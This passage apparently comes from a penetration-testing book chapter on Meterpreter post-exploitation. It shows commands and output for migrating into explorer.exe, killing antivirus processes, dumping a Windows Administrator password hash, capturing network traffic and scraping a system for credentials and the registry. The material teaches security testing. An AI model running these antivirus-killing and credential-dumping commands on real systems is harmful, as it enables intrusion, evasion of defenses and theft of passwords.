Meterpreter
93
[*] Migrating to explorer.exe...
[*] Migrating into process ID 816
[*] New server process: Explorer.EXE (816)
Killing Antivirus Software
Antivirus software can block certain tasks. During penetration tests, we have
seen “smarter” antivirus or host-based intrusion prevention products block
our ability to run certain attack vectors. In such cases, we can run the
killav
script to stop the processes preventing our tasks from running.
meterpreter >
run killav
[*] Killing Antivirus services on the target...
[*] Killing off cmd.exe...
[*] Killing off cmd.exe...
Obtaining System Password Hashes
Obtaining a copy of the system’s password hashes allows us to run pass-the-
hash attacks or to brute force the hash to reveal the plain-text password. We
can obtain the password hashes with the
run hashdump
command:
meterpreter >
run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY de4b35306c5f595438a2f78f768772d2...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
Viewing All Traffic on a Target Machine
To see all traffic on a target, we can run a packet recorder. Everything cap-
tured by
packetrecorder
is saved in the
.pcap
file format to be parsed with a
tool such as Wireshark.
In this listing, we run the
packetrecorder
script with the
-i 1
option, which
specifies which interface we want to use to perform the packet captures:
meterpreter >
run packetrecorder -i 1
[*] Starting Packet capture on interface 1
[*] Packet capture started
Scraping a System
The
scraper
script enumerates just about everything you could ever want
from a system. It will grab the usernames and passwords, download the entire
registry, dump password hashes, gather system information, and export the
HKEY_CURRENT_USER
(
HKCU
).